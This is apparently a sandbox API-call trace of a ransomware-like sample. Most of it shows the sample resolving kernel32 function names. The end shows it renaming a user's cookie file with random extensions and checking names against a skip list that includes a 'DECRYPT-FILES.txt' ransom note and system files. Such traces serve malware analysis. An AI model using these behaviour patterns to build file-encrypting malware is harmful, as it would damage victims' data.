[0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0181.324] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0181.324] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0181.324] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0181.324] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0181.324] lstrlenA (lpString="CREATEFILEW") returned 11 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0181.324] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0181.324] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0181.324] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0181.324] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0181.324] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0181.325] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0181.325] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0181.325] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0181.325] lstrlenA (lpString="CREATEJOBSET") returned 12 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0181.325] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0181.325] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0181.325] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0181.325] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0181.325] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0181.325] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0181.325] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0181.325] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0181.325] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0181.325] lstrlenA (lpString="CREATEPIPE") returned 10 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0181.325] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0181.325] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0181.325] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0181.325] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0181.326] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0181.326] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0181.326] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0181.326] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0181.326] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0181.326] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0181.326] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0181.326] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0181.326] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0181.326] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0181.326] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0181.326] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0181.326] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0181.326] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0181.326] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0181.326] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0181.326] lstrlenA (lpString="CREATETHREAD") returned 12 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0181.326] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0181.326] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0181.327] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0181.327] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0181.327] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0181.327] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0181.327] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0181.327] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0181.327] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0181.327] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0181.327] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0181.327] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0181.327] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0181.327] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0181.327] lstrlenA (lpString="CTRLROUTINE") returned 11 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0181.327] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0181.327] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0181.327] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0181.327] lstrlenA (lpString="DEBUGBREAK") returned 10 [0181.327] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0181.328] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0181.328] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0181.328] lstrlenA (lpString="DECODEPOINTER") returned 13 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0181.328] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0181.328] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0181.328] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0181.328] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0181.328] lstrlenA (lpString="DELETEATOM") returned 10 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0181.328] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0181.328] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0181.328] lstrlenA (lpString="DELETEFIBER") returned 11 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0181.328] lstrlenA (lpString="DELETEFILEA") returned 11 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0181.328] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0181.328] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0181.328] lstrlenA (lpString="DELETEFILEW") returned 11 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0181.328] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0181.328] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0181.328] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0181.329] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0181.329] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0181.329] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0181.329] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0181.329] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0181.329] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0181.329] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0181.329] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0181.329] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0181.329] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0181.329] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0181.329] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0181.329] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0181.329] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0181.329] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0181.329] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0181.329] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0181.329] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0181.329] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0181.330] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0181.330] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0181.330] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0181.330] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0181.330] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0181.330] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0181.330] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0181.330] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0181.330] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0181.330] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0181.330] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0181.330] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0181.330] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0181.330] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0181.330] lstrcpyW (in: lpString1=0x8b0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0181.334] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F") returned 129 [0181.334] wsprintfW (in: param_1=0x36fd86c, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F.PQY2") returned 134 [0181.334] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.qi6f"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.QI6F.PQY2" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@ad13.adfarm1.adition[1].txt.qi6f.pqy2"), dwFlags=0x0) returned 1 [0181.338] VirtualFree (lpAddress=0x8a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.339] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.339] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0181.339] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x44bd95f0, ftCreationTime.dwHighDateTime=0x1d2faf3, ftLastAccessTime.dwLowDateTime=0x44bd95f0, ftLastAccessTime.dwHighDateTime=0x1d2faf3, ftLastWriteTime.dwLowDateTime=0xab502180, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x16e, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ", cAlternateFileName="5P5NRG~1.KNW")) returned 1 [0181.342] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ", lpString2="DECRYPT-FILES.txt") returned -1 [0181.342] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ", lpString2="autorun.inf") returned -1 [0181.342] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ", lpString2="boot.ini") returned -1 [0181.342] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ", lpString2="desktop.ini") returned -1 [0181.342] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ", lpString2="ntuser.dat") returned -1 [0181.342] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ", lpString2="iconcache.db") returned -1 [0181.342] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ", lpString2="bootsect.bak") returned -1 [0181.342] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@adfarm1.adition[2].txt.knweQ", lpString2="ntuser.dat.log") returned -1 [0181.342] lstrcmpiW 